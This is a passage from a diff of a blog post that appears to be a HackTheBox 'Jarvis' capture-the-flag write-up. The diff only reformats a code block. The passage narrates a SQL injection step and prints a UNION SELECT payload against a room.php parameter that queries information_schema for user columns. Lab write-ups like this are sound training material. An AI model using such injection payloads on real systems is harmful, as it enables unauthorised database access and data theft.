ponderng/Sidequests/_posts/2019-08-19-hackthebox-jarvis.md

 This is all good info, but it didn&#8217;t get me what I wanted, which was the &#8216;user&#8217; info.
 The query for extracting the tables doesn&#8217;t show us any more tables besides &#8216;hotel&#8217;.
 I knew there had to be more, so I tried another table extraction.

-<pre class="lang:zsh highlight:0 decode:true">room.php?cod=99%2527 UNION SELECT ALL 1,table_name,3,4,table_name,6,7 FROM information_schema.columns where column_name like 'user' limit 0, 1</pre>
+`room.php?cod=99%2527 UNION SELECT ALL 1,table_name,3,4,table_name,6,7 FROM information_schema.columns where column_name like 'user' limit 0, 1`

 <img class="alignnone size-full wp-image-154" src="/assets/uploads/2019/08/js_sqli_table2.png" alt="" width="300" height="324" srcset="/assets/uploads/2019/08/js_sqli_table2.png 300w, /assets/uploads/2019/08/js_sqli_table2-278x300.png 278w" sizes="(max-width: 300px) 100vw, 300px" />